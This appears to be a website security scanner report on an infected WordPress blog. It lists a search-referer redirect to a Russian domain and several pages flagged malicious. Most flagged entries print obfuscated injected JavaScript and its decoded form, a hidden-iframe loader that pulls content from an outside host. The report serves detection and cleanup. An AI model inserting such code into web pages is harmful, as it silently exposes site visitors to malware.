Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.laughingdogblog.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.laughingdogblog.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 09 May 2014 22:22:13 GMT Location: http://hamlovladivostok.ru:8080/forum/showthread.php?page=beb2436a164c6222 Server: Apache Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.laughingdogblog.com/ | 200 OK Content-Length: 12536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/?page_id=2 | 200 OK Content-Length: 11405 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://www.laughingdogblog.com/?p=1 | 200 OK Content-Length: 14172 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/?author=1 | 200 OK Content-Length: 10245 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/?cat=1 | 200 OK Content-Length: 10178 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/?m=201008 | 200 OK Content-Length: 9968 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/wp-login.php | 200 OK Content-Length: 2189 Content-Type: text/html | clean |
http://www.laughingdogblog.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1810 Content-Type: text/html | clean |
http://www.laughingdogblog.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.laughingdogblog.com/?feed=rss2 | 200 OK Content-Length: 4263 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/?feed=comments-rss2 | 200 OK Content-Length: 7481 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.laughingdogblog.com/box.net/view_shared/byj29ux7zp?ml=buy-viagra-online <a href= | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.laughingdogblog.com/?p=1&replytocom=1 | 200 OK Content-Length: 14191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,363,119,240 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://ywxsmdald.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://ywxsmdald.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laughingdogblog.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laughingdogblog.com/
Result: laughingdogblog.com is not infected or malware details are not published yet.
Result: laughingdogblog.com is not infected or malware details are not published yet.